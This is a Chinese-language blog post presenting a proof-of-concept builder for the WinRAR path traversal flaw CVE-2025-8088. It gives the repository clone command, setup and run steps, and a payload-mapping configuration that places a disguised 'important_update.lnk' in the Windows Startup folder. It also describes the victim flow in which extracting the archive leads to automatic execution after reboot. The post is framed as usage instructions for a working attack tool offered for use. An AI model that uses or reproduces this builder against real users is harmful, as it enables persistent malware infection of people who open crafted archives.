WinRAR路径遍历漏洞利用详解(CVE-2025-8088)

本文详细介绍了针对WinRAR路径遍历漏洞(CVE-2025-8088)的POC利用方法,涉及RAR文件结构操作、多ADS流利用技术,能够将恶意载荷写入Windows启动目录实现持久化攻击。

CVE-2025-8088-WinRAR构建器

针对影响7.12及更低版本WinRAR漏洞(CVE-2025-8088)的POC利用程序

🚀 工作原理

  1. 创建包含其他载荷的RAR嵌入文件
  2. 使用多ADS流🔄 - 附加具有不同路径遍历深度的载荷流
  3. 操作RAR头文件⚙️ - 修改存档结构以利用路径遍历漏洞
  4. 将载荷投放至启动文件夹📂 - 在解压时尝试将载荷写入Windows启动文件夹

🛠️ 使用方法

  1. 克隆仓库
1
2
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. 准备载荷
1
mkdir payloads
  • 将载荷添加到该文件夹(exe、dll、lnk等)
  • 修改脚本中的PAYLOAD_MAPPING
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# 2. 将我们的载荷映射到相应的目标位置
#   格式:(payloads_dir中的文件名,目标提取路径)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # 载荷1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # 载荷2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # 载荷3
    # 添加你自己的载荷
]
  1. 运行利用程序
1
python builder.py 

🔄 执行流程

  1. 受害者使用易受攻击的WinRAR(≤7.12)解压RAR文件
  2. 载荷被写入目标文件夹,例如:
    1
    
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. 下次重启时➡️载荷自动执行

📋 要求

  • Windows操作系统🪟
  • Python 3.x🐍
  • 已安装WinRAR
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计